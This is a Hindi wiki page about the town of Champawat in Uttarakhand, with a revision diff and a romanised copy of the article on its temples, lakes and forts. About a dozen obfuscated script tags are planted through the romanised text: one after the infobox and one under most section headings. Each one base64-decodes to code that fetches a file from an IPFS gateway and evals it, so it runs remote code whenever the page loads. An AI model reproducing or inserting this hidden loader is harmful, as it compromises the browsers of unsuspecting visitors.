Difference between revisions of "चम्पावत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 35: Line 35:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
 
'''चम्पावत''' [[टनकपुर]] से 75 किमी की दूरी पर राष्ट्रीय राजमार्ग कि किनारे  [[उत्तराखण्ड]] राज्य के [[चम्पावत ज़िला|चम्पावत ज़िले]] का प्रशासनिक मुख्यालय है।  यह स्थल ऐतिहासिक होने के साथ साथ अत्यंत मनोहारी एवं नैसर्गिक छटासे परिपूर्ण है स्रथल के नजदी मानेश्वर की चोटी से भव्य हिम श्रंखलाओं का मन भावन दृष्य पर्यटकों कों अपनीओर आकर्षित कर लेता है पहाड़ों और मैदानों के बीच से होकर बहती नदियाँ अद्भुत छटा बिखेरती हैं। चंपावत में पर्यटकों को वह सब कुछ मिलता है जो वह एक पर्वतीय स्थान से चाहते हैं। यह नगर समुद्र तल से लगभग 1.6 किमी की ऊँचाई पर स्थित है।   
 
'''चम्पावत''' [[टनकपुर]] से 75 किमी की दूरी पर राष्ट्रीय राजमार्ग कि किनारे  [[उत्तराखण्ड]] राज्य के [[चम्पावत ज़िला|चम्पावत ज़िले]] का प्रशासनिक मुख्यालय है।  यह स्थल ऐतिहासिक होने के साथ साथ अत्यंत मनोहारी एवं नैसर्गिक छटासे परिपूर्ण है स्रथल के नजदी मानेश्वर की चोटी से भव्य हिम श्रंखलाओं का मन भावन दृष्य पर्यटकों कों अपनीओर आकर्षित कर लेता है पहाड़ों और मैदानों के बीच से होकर बहती नदियाँ अद्भुत छटा बिखेरती हैं। चंपावत में पर्यटकों को वह सब कुछ मिलता है जो वह एक पर्वतीय स्थान से चाहते हैं। यह नगर समुद्र तल से लगभग 1.6 किमी की ऊँचाई पर स्थित है।   
 
उत्तराखण्ड की राज्य में प्रशासनिक सुविधा के उद्देश्य से दो मुख्य संभाग (मंडल) बनाऐ गये हैं [[गढ़वाल]] तथा [[कुमाऊँ]]। कुमाऊँ संभाग (मंडल) में [[नैनीताल]], [[पिथौरागढ़]], [[अल्मोड़ा]], [[बागेश्वर]], चम्पावत तथा [[ऊधमसिंह नगर]] जनपद सम्मिलित हैं जबकि गढ़वाल संभाग में [[पौडी गढ़वाल]], [[टिहरी गढ़वाल]], [[उत्तरकाशी]], [[देहरादून]], [[चमोली]], [[रुद्रप्रयाग]] तथा [[हरिद्वार]] जनपद शामिल है।  
 
उत्तराखण्ड की राज्य में प्रशासनिक सुविधा के उद्देश्य से दो मुख्य संभाग (मंडल) बनाऐ गये हैं [[गढ़वाल]] तथा [[कुमाऊँ]]। कुमाऊँ संभाग (मंडल) में [[नैनीताल]], [[पिथौरागढ़]], [[अल्मोड़ा]], [[बागेश्वर]], चम्पावत तथा [[ऊधमसिंह नगर]] जनपद सम्मिलित हैं जबकि गढ़वाल संभाग में [[पौडी गढ़वाल]], [[टिहरी गढ़वाल]], [[उत्तरकाशी]], [[देहरादून]], [[चमोली]], [[रुद्रप्रयाग]] तथा [[हरिद्वार]] जनपद शामिल है।  
Line 42: Line 41:
 
चम्पावत कई वर्षों तक [[कुमाऊँ]] के शासकों की राजधानी रहा है। चम्पावत नगर में कत्यूरी वंश के राजाओं द्वारा स्थापित तेरहवीं शताब्दी का बालेश्वर मंदिर तत्काली शिल्प कला का एक उत्कृष्ट नमूना है।  
 
चम्पावत कई वर्षों तक [[कुमाऊँ]] के शासकों की राजधानी रहा है। चम्पावत नगर में कत्यूरी वंश के राजाओं द्वारा स्थापित तेरहवीं शताब्दी का बालेश्वर मंदिर तत्काली शिल्प कला का एक उत्कृष्ट नमूना है।  
 
==पर्यटन==
 
==पर्यटन==
{{main|पूर्णागिरि मेला}}
+
===पूर्णागिरि मंदिर===
===[[पूर्णागिरि मेला|पूर्णागिरि मंदिर]]===
+
{{main|पूर्णागिरि मंदिर}}
पुन्यागिरि समुद्र तल से 3000 मीटर की उंचाई पर हैयह काली नदी के दांये किनारे पर स्थित है यहां विश्वत संक्रांति को मेला आरंभ होकर लभगग चालीस दिन तक चलता है मार्च अप्रैल के मध्य चैत्र मास की नवरात्रि में यहां अपार श्रद्धालु दर्शनार्थ आते हैं।  
+
पूर्णागिरि [[समुद्र]] तल से 3000 मीटर की उंचाई पर है। यह काली नदी के दांये किनारे पर स्थित है। यहाँ विश्वत संक्रांति को मेला आरंभ होकर लभगग चालीस दिन तक चलता है। [[मार्च]] [[अप्रैल]] के मध्य [[चैत्र]] [[मास]] की [[नवरात्रि]] में यहाँ अपार श्रद्धालु दर्शनार्थ आते हैं। जनपद चम्पावत के [[टनकपुर]] उप संभाग के पर्वतीय अंचल में स्थित अन्नपूर्णा चोटी के शिखर में लगभग 3000 फिट की उंचाई पर यह शक्ति पीठ स्थापित है। धार्मिक आस्था के साथ ही नैसर्गिक सौंदर्य के लिये भी यह स्थल महत्वपूर्ण है। इस स्थल पर जाने हेतु टनकपुर से लगभग 20 किमी तक मोटर मार्ग से तथा 3 किमी पैदल चलकर पहुँचा जा सकता है।
जनपद चम्पावत के टनकपुर उप संभाग के पर्वतीय अंचल में स्थित अन्नपूर्णा चोटी के शिखर में लगभग 3000 फिट की उंचाई पर यह शक्ति पीठ स्थापित है धार्मिक आस्था के साथ ही नैसर्गिक सौंदर्य के लिये भी यह स्थल महत्वपूर्ण है इस स्थल पर जाने हेतु टनकाुन से लगगभग 20 किमी तक मोटर मार्ग से तथा 3 किमी पैदल चलकर पहुचा जा सकता है।
+
===श्यामलाताल===
===[[श्यामलाताल]]===
+
{{main|श्यामलाताल}}
टनकपुर से चम्पावत की ओर लगभग 22 किमी दूरी पर स्थित सूचीढांड नामक स्थान से 5 किमी इस पवित्र एवं मनोहारी स्थल हेतु मोटर मार्ग से पहुंचा जा सकता है यहां पर स्वामी विवेकानन्छकी घ्यान स्थली के रूप में वर्तमान में एक आश्रम स्थापित है श्यामल ताल के स्वच्छ एवं नीले जल पर नोका विहार का आनन्द लियाा जा सकता है रात्रि विश्राम हेतु यहां पर पर्यटक आवास ग्रह उपलब्ध है देवीधुरा मेला
+
टनकपुर से चम्पावत की ओर लगभग 22 किमी दूरी पर स्थित है। सूचीढांड नामक स्थान से 5 किमी इस पवित्र एवं मनोहारी स्थल हेतु मोटर मार्ग से पहुंचा जा सकता है। यहाँ पर [[स्वामी विवेकानन्द]] जी की ध्यान स्थली के रूप में वर्तमान में एक आश्रम स्थापित है। श्यामलाताल के स्वच्छ एवं नीले जल पर नौका विहार का आनन्द लिया जा सकता है। रात्रि विश्राम हेतु यहां पर पर्यटक आवास ग्रह उपलब्ध है।
===[[मीठा रीठा साहिब]]===
+
===मीठा रीठा साहिब===
रीठा साहिब यह स्थान लोहाघाट से लगभग 64 किमी की दूरीपर स्थित है सिक्खों के दसवें गुरू यहां आये थे एवं उन्होंने यहां पर रीठे के वृक्ष के नीचे विश्राम किया था । गुरू के प्रताप से उनके शिष्य ने जिस वृक्ष से अपनी क्षुधा शान्त करने हेतु रीठे तोडे थे , उस वृक्ष के रीठे मीठे हो गये थे। इस स्थल को मीठा रीठा साहिब भी कहा जाता है  यहां पर सिक्खों द्वारा भव्य गुरूद्वारा निर्मित किया गया है। प्रति वर्ष वैशाखी पर यहां पर बहुत विशाल मेले का आयोजन भी किया जाता है
+
{{main|मीठा रीठा साहिब}}
===[[आदिगुरू गोरखनाथ की धूनी]]===
+
मीठा रीठा साहिब [[लोहाघाट]] से लगभग 64 किमी की दूरी पर स्थित है। [[सिक्ख|सिक्खों]] के दसवें गुरु [[गुरु गोविंद सिंह]] यहाँ आये थे एवं उन्होंने यहाँ पर रीठे के वृक्ष के नीचे विश्राम किया था। गुरु के प्रताप से उनके शिष्य ने जिस वृक्ष से अपनी क्षुधा शान्त करने हेतु रीठे तोडे थे, उस वृक्ष के रीठे मीठे हो गये थे। इस स्थल को मीठा रीठा साहिब भी कहा जाता है। यहाँ पर सिक्खों द्वारा भव्य गुरुद्वारा निर्मित किया गया है। प्रति वर्ष [[वैशाखी]] पर यहाँ पर बहुत विशाल मेले का आयोजन भी किया जाता है।
आदिगुरू गोरखनाथ की धूनी चम्पावत से लगभग 33किमी की दूरी परस्थित मं चनामक स्थान से इस स्थल हेतु लगभग 1.5 किमी की दूरी पैदल तय करने के उपरांत इस स्थान पर पहुंचा जा सकता है । जनश्रुति है कि यह धूनी सतयुग से लगातार प्रज्वलित है। यह स्थल नैसर्गिक सौंदर्यता से परिपूर्ण है।
+
===आदिगुरु गोरखनाथ की धूनी===
===[[पंचेश्वर महादेव मंदिर]]===
+
{{Main|आदिगुरु गोरखनाथ की धूनी}}
परमेश्वर लोहाघाट से लगभग 38 किमी की दूरी पर काली एवं सरयू नदी के संगम पर स्थित यह स्थल मत्स्य आखेट एवं रिवर राफ्टिंग के लिये विख्यात है। इस स्थल पर मकर संक्रान्ति के अवसर पर विशाल मेले का आयोजन भी किया जाता है ।
+
आदिगुरु गोरखनाथ की धूनी चम्पावत से लगभग 33 किमी की दूरी पर स्थित है। चनामक स्थान से इस स्थल हेतु लगभग 1.5 किमी की दूरी पैदल तय करने के उपरांत इस स्थान पर पहुंचा जा सकता है। जनश्रुति है कि यह धूनी [[सतयुग]] से लगातार प्रज्वलित है। यह स्थल नैसर्गिक सौंदर्यता से परिपूर्ण है।
===[[वाणासुर का किला]]===
+
===पंचेश्वर महादेव मंदिर===
लोहाघाट से लगभग 7 किमी की दूरी पर कर्णरायत नामक स्थान से लगभग 1.5 किमी की दूरी पैदल तय करने के उपरांत इस स्थल पर पहुंचा जा सकता है। किंवदंती है कि यहां पर कृष्ण के द्वारा अपने पौत्र का अपहरण किये जाने से क्रुद्ध होकर वाणासुर का वध किया गया था। इस स्थल पर पुरातात्विक दृष्टि से मशहूर किला आज भी विद्यमान है । इस स्थल से एक ओर भव्य हिमालय श्रंखलाओं का दृश्य देखा जा सकता है। तो दूसरी ओर [[लोहाघाट]] सहित [[मायावती अद्वैत आश्रम|मायावती आश्रम]] एवं अन्य नैसर्गिक छटाओं का भी आनन्द लिया जा सकता है।
+
{{Main|पंचेश्वर महादेव मंदिर}}
===[[मायावती अद्वैत आश्रम]]===
+
पंचेश्वर महादेव मंदिर लोहाघाट से लगभग 38 किमी की दूरी पर काली एवं [[सरयू नदी]] के संगम पर स्थित है। यह स्थल मत्स्य आखेट एवं रिवर राफ्टिंग के लिये विख्यात है। इस स्थल पर [[मकर संक्रान्ति]] के अवसर पर विशाल मेले का आयोजन भी किया जाता है।
मायावती अद्वैत आश्रम लोहाघाट से 9 किमी की दूरी परसघन बांज एवं बुरांस वृक्षों के बीच स्थापित मायावती आश्रमा स्वामी विवेकानन्द का आश्रय स्थल रहा है। यहां पर स्वामी विवेकानन्द 1901 में आये थे एवं लगभग एक सप्ताह तक इस स्थल पर उन्होंने निवास किया था। यहां पर वर्तमान में एक धर्मार्थ चिकित्सालय भी आश्रम द्वारा संचालित किया जाता है।  
+
===वाणासुर का क़िला===
 +
{{Main|वाणासुर का क़िला}}
 +
लोहाघाट से लगभग 7 किमी की दूरी पर कर्णरायत नामक स्थान से लगभग 1.5 किमी की दूरी पैदल तय करने के उपरांत इस स्थल पर पहुंचा जा सकता है। किंवदंती है कि यहां पर [[कृष्ण]] के द्वारा अपने पौत्र का अपहरण किये जाने से क्रुद्ध होकर वाणासुर का वध किया गया था। इस स्थल पर पुरातात्विक दृष्टि से मशहूर क़िला आज भी विद्यमान है। इस स्थल से एक ओर भव्य [[हिमालय]] श्रृंखलाओं का दृश्य देखा जा सकता है तो दूसरी ओर [[लोहाघाट]] सहित [[मायावती अद्वैत आश्रम]] एवं अन्य नैसर्गिक छटाओं का भी आनन्द लिया जा सकता है।
 +
===मायावती अद्वैत आश्रम===
 +
{{Main|मायावती अद्वैत आश्रम}}
 +
मायावती अद्वैत आश्रम लोहाघाट से 9 किमी की दूरी पर सघन बांज एवं बुरांस वृक्षों के बीच स्थापित मायावती आश्रम [[स्वामी विवेकानन्द]] का आश्रय स्थल रहा है। यहाँ पर स्वामी विवेकानन्द 1901 में आये थे एवं लगभग एक सप्ताह तक इस स्थल पर उन्होंने निवास किया था। यहां पर वर्तमान में एक धर्मार्थ चिकित्सालय भी आश्रम द्वारा संचालित किया जाता है।  
 +
===देवीधुरा मंदिर===
 
{{main|देवीधुरा मेला}}
 
{{main|देवीधुरा मेला}}
===[[देवीधुरा मेला|देवीधुरा मंदिर]]===
+
देवीधुरा स्थल चम्पावत हल्द्वानी मोटर मार्ग पर चम्पावत से लगभग 60 किमी की दूरी पर समुद्र सतह से लगभग 6500 फिट की उंचाई पर स्थित है। श्रावण मास की पूर्णिमा को हजारों श्रद्धालुओं को आकर्षित करने वाला पौराणिक धार्मिक एवं एतिहासिक स्थल देवीधुरा अपने अनूठे तरह के पाषाण युद्ध के लिये पूरे [[भारत]] प्रसिद्ध है। इस स्थल से लगभग 300 किमी लम्बी हिम श्रृंखलाओं के भव्य दृश्य का आनंद लिया जा सकता है।
देवीधुरा यह स्थल चम्पावत हल्द्वानी मोटर मार्ग परचम्पावत से लगभग 60 किमी की दूरी पर समुद्र सतह से लगभग 6500 फिट कीउंचाई पर स्थित है। श्रावण मास की पूर्णिमा को हजारों श्रद्धालुओं को आकर्षित करने वाला पौराणिक धार्मिक एवं एतिहासिक स्थल देवीधुरा अपने अनूठे तरह के पाषाण युद्ध के लिये पूरे भारत प्रसिद्ध है। इस स्थल से लगभग 300 किमी लम्बी हिम श्रंखलाओं के भव्य दृश्य का आनंद लिया जा सकता है।
+
===एवटमाउन्ट===
===[[एवटमाउन्ट]]===
+
{{main|एवटमाउन्ट}}
लोहाघाट से 9 किमी की दूरी पर समुद्र तल से लगभग 7000 फिट की उंचाई पर स्थित यह स्थल अत्यन्त दर्शनीय है यहां पर 1945 में स्थापिन चर्च भी विद्यमान है। यह स्थल पूर्व मे ऐंग्लो इन्डियन कालोनी के रूप में विद्यमान रहा है। इस स्थल के उत्तर की ओर भव्य हिमालय श्रंखलाओं का विहंगम दृश्य दृष्टिगोचर होता है। तो दूसरी ओर प्राकृतिक छटाओं का भी आनन्द लिया जा सकता है।
+
[[लोहाघाट]] से 9 किमी की दूरी पर समुद्र तल से लगभग 7000 फिट की उंचाई पर स्थित यह स्थल अत्यन्त दर्शनीय है यहां पर 1945 में स्थापिन चर्च भी विद्यमान है। यह स्थल पूर्व मे ऐंग्लो इन्डियन कालोनी के रूप में विद्यमान रहा है। इस स्थल के उत्तर की ओर भव्य हिमालय श्रंखलाओं का विहंगम दृश्य दृष्टिगोचर होता है। तो दूसरी ओर प्राकृतिक छटाओं का भी आनन्द लिया जा सकता है।
===[[लोहाघाट]]===
+
===लोहाघाट===
लोहाघाट चम्पावत नगर से 13 किमी कीदूरी पर राष्ट्रीय राजमार्ग के किनारे सघन देवदार वृक्षों से आक्ष्छाादित यह  स्थल समुद्र सतहसे लगभग 5500 फिट की उंचाई पर लोहवती नदी के समीव स्थित है। स्वास्थ्य लाभ के लिये यह स्थल अत्यंत उपयुक्त माना गया है ।
+
{{main|लोहाघाट}}
 +
लोहाघाट चम्पावत नगर से 13 किमी की दूरी पर राष्ट्रीय राजमार्ग के किनारे सघन देवदार वृक्षों से आच्छादित स्थल है जो समुद्र सतह से लगभग 5500 फिट की उंचाई पर लोहवती नदी के समीप स्थित है। स्वास्थ्य लाभ के लिये यह स्थल अत्यंत उपयुक्त माना गया है।
 
==वीथिका==
 
==वीथिका==
 
<gallery>
 
<gallery>
 
चित्र:Champawat.JPG|चम्पावत की प्राकृतिक छटा
 
 
चित्र:Devidhura1.JPG|देवीधुरा कस्बे की प्राकृतिक छटा
 
चित्र:Devidhura1.JPG|देवीधुरा कस्बे की प्राकृतिक छटा
 
चित्र:Devidhura2.JPG|माँ बाराही की गुफा का उत्तरी प्रवेश मार्ग
 
चित्र:Devidhura2.JPG|माँ बाराही की गुफा का उत्तरी प्रवेश मार्ग
Line 79: Line 83:
 
चित्र:Moumtavot.JPG|विवेकानन्द का आश्रय स्थल
 
चित्र:Moumtavot.JPG|विवेकानन्द का आश्रय स्थल
 
चित्र:Mount.JPG|[[एवटमाउन्ट]] की छटा
 
चित्र:Mount.JPG|[[एवटमाउन्ट]] की छटा
चित्र:Vanasur.JPG|वाणासुर किले का विहंगम दृश्य
+
चित्र:Vanasur.JPG|वाणासुर क़िले का विहंगम दृश्य
चित्र:Vanasur_1.JPG|वाणासुर किले का प्रवेश द्वार
+
चित्र:Vanasur_1.JPG|वाणासुर क़िले का प्रवेश द्वार
 
चित्र:Pancheshwer.jpg|घने देवदारों के बीच [[पंचेश्वर महादेव मंदिर]]  
 
चित्र:Pancheshwer.jpg|घने देवदारों के बीच [[पंचेश्वर महादेव मंदिर]]  
 
चित्र:Mitha_retha_saheb.jpg|[[मीठा रीठा साहिब]] का विहंगम दृश्य
 
चित्र:Mitha_retha_saheb.jpg|[[मीठा रीठा साहिब]] का विहंगम दृश्य
 
</gallery>
 
</gallery>
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तराखंड के पर्यटन स्थल}}
+
{{उत्तराखंड के नगर}}{{उत्तराखंड के पर्यटन स्थल}}
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
[[Category:उत्तराखंड के पर्यटन स्थल]]
 
[[Category:उत्तराखंड के पर्यटन स्थल]]
[[Category:धार्मिक स्थल कोश]]
 
[[Category:हिन्दू धार्मिक स्थल]]
 
__INDEX__
 
__NOTOC__
 
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
{{उत्तराखंड के नगर}}
 
[[Category:उत्तराखंड]][[Category:उत्तराखंड के पर्यटन स्थल]][[Category: पर्यटन कोश]]
 
 
[[Category:उत्तराखंड_के_नगर]]
 
[[Category:उत्तराखंड_के_नगर]]
 
[[Category:भारत के नगर]]
 
[[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 11:11, 25 September 2012

champavat
vivaran prakriti ki god mean basa uttarakhand ka yah chhota-sa nagar svayan mean b da itihas samete hai.
rajy uttarakhand
zila champavat zila
marg sthiti yah shahar s dakamarg dvara tanakapur lagabhag 75 ki.mi. doori par sthit hai.
prasiddhi devidhura mela, bagval, evatamaunt, ‎poornagiri mela
kaise pahuanchean kisi bhi shahar se bas aur taiksi dvara pahuancha ja sakata hai.
havaee adda pantanagar, naini saini havaee adda, pithauragadh
relave steshan tanakapur relave steshan
kya dekhean uttarakhand paryatan
kya kharidean gahat sthaniy dal,
es.ti.di. kod 0176
savadhani barasat mean bhooskhalan
chitr:Map-icon.gif googal manachitr, havaee adda
any janakari champavat mean ap bagval ka bhi anand le sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

champavat tanakapur se 75 kimi ki doori par rashtriy rajamarg ki kinare uttarakhand rajy ke champavat zile ka prashasanik mukhyalay hai. yah sthal aitihasik hone ke sath sath atyant manohari evan naisargik chhatase paripoorn hai srathal ke najadi maneshvar ki choti se bhavy him shrankhalaoan ka man bhavan drishy paryatakoan koan apanior akarshit kar leta hai paha doan aur maidanoan ke bich se hokar bahati nadiyaan adbhut chhata bikherati haian. chanpavat mean paryatakoan ko vah sab kuchh milata hai jo vah ek parvatiy sthan se chahate haian. yah nagar samudr tal se lagabhag 1.6 kimi ki ooanchaee par sthit hai. uttarakhand ki rajy mean prashasanik suvidha ke uddeshy se do mukhy sanbhag (mandal) banaai gaye haian gadhaval tatha kumaooan. kumaooan sanbhag (mandal) mean nainital, pithauragadh, almo da, bageshvar, champavat tatha oodhamasianh nagar janapad sammilit haian jabaki gadhaval sanbhag mean paudi gadhaval, tihari gadhaval, uttarakashi, deharadoon, chamoli, rudraprayag tatha haridvar janapad shamil hai.

itihas

thumb||left|250px|evatamaunt mean khila parvatiy pushp buraans champavat kee varshoan tak kumaooan ke shasakoan ki rajadhani raha hai. champavat nagar mean katyoori vansh ke rajaoan dvara sthapit terahavian shatabdi ka baleshvar mandir tatkali shilp kala ka ek utkrisht namoona hai.

paryatan

poornagiri mandir

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

poornagiri samudr tal se 3000 mitar ki uanchaee par hai. yah kali nadi ke daanye kinare par sthit hai. yahaan vishvat sankraanti ko mela aranbh hokar labhagag chalis din tak chalata hai. march aprail ke madhy chaitr mas ki navaratri mean yahaan apar shraddhalu darshanarth ate haian. janapad champavat ke tanakapur up sanbhag ke parvatiy aanchal mean sthit annapoorna choti ke shikhar mean lagabhag 3000 phit ki uanchaee par yah shakti pith sthapit hai. dharmik astha ke sath hi naisargik sauandary ke liye bhi yah sthal mahatvapoorn hai. is sthal par jane hetu tanakapur se lagabhag 20 kimi tak motar marg se tatha 3 kimi paidal chalakar pahuancha ja sakata hai.

shyamalatal

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tanakapur se champavat ki or lagabhag 22 kimi doori par sthit hai. soochidhaand namak sthan se 5 kimi is pavitr evan manohari sthal hetu motar marg se pahuancha ja sakata hai. yahaan par svami vivekanand ji ki dhyan sthali ke roop mean vartaman mean ek ashram sthapit hai. shyamalatal ke svachchh evan nile jal par nauka vihar ka anand liya ja sakata hai. ratri vishram hetu yahaan par paryatak avas grah upalabdh hai.

mitha ritha sahib

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

mitha ritha sahib lohaghat se lagabhag 64 kimi ki doori par sthit hai. sikkhoan ke dasavean guru guru goviand sianh yahaan aye the evan unhoanne yahaan par rithe ke vriksh ke niche vishram kiya tha. guru ke pratap se unake shishy ne jis vriksh se apani kshudha shant karane hetu rithe tode the, us vriksh ke rithe mithe ho gaye the. is sthal ko mitha ritha sahib bhi kaha jata hai. yahaan par sikkhoan dvara bhavy gurudvara nirmit kiya gaya hai. prati varsh vaishakhi par yahaan par bahut vishal mele ka ayojan bhi kiya jata hai.

adiguru gorakhanath ki dhooni

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

adiguru gorakhanath ki dhooni champavat se lagabhag 33 kimi ki doori par sthit hai. chanamak sthan se is sthal hetu lagabhag 1.5 kimi ki doori paidal tay karane ke uparaant is sthan par pahuancha ja sakata hai. janashruti hai ki yah dhooni satayug se lagatar prajvalit hai. yah sthal naisargik sauandaryata se paripoorn hai.

pancheshvar mahadev mandir

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pancheshvar mahadev mandir lohaghat se lagabhag 38 kimi ki doori par kali evan sarayoo nadi ke sangam par sthit hai. yah sthal matsy akhet evan rivar raphtiang ke liye vikhyat hai. is sthal par makar sankranti ke avasar par vishal mele ka ayojan bhi kiya jata hai.

vanasur ka qila

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

lohaghat se lagabhag 7 kimi ki doori par karnarayat namak sthan se lagabhag 1.5 kimi ki doori paidal tay karane ke uparaant is sthal par pahuancha ja sakata hai. kianvadanti hai ki yahaan par krishna ke dvara apane pautr ka apaharan kiye jane se kruddh hokar vanasur ka vadh kiya gaya tha. is sthal par puratatvik drishti se mashahoor qila aj bhi vidyaman hai. is sthal se ek or bhavy himalay shrriankhalaoan ka drishy dekha ja sakata hai to doosari or lohaghat sahit mayavati advait ashram evan any naisargik chhataoan ka bhi anand liya ja sakata hai.

mayavati advait ashram

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

mayavati advait ashram lohaghat se 9 kimi ki doori par saghan baanj evan buraans vrikshoan ke bich sthapit mayavati ashram svami vivekanand ka ashray sthal raha hai. yahaan par svami vivekanand 1901 mean aye the evan lagabhag ek saptah tak is sthal par unhoanne nivas kiya tha. yahaan par vartaman mean ek dharmarth chikitsalay bhi ashram dvara sanchalit kiya jata hai.

devidhura mandir

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

devidhura sthal champavat haldvani motar marg par champavat se lagabhag 60 kimi ki doori par samudr satah se lagabhag 6500 phit ki uanchaee par sthit hai. shravan mas ki poornima ko hajaroan shraddhaluoan ko akarshit karane vala pauranik dharmik evan etihasik sthal devidhura apane anoothe tarah ke pashan yuddh ke liye poore bharat prasiddh hai. is sthal se lagabhag 300 kimi lambi him shrriankhalaoan ke bhavy drishy ka anand liya ja sakata hai.

evatamaunt

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

lohaghat se 9 kimi ki doori par samudr tal se lagabhag 7000 phit ki uanchaee par sthit yah sthal atyant darshaniy hai yahaan par 1945 mean sthapin charch bhi vidyaman hai. yah sthal poorv me aianglo indiyan kaloni ke roop mean vidyaman raha hai. is sthal ke uttar ki or bhavy himalay shrankhalaoan ka vihangam drishy drishtigochar hota hai. to doosari or prakritik chhataoan ka bhi anand liya ja sakata hai.

lohaghat

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

lohaghat champavat nagar se 13 kimi ki doori par rashtriy rajamarg ke kinare saghan devadar vrikshoan se achchhadit sthal hai jo samudr satah se lagabhag 5500 phit ki uanchaee par lohavati nadi ke samip sthit hai. svasthy labh ke liye yah sthal atyant upayukt mana gaya hai.

vithika


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

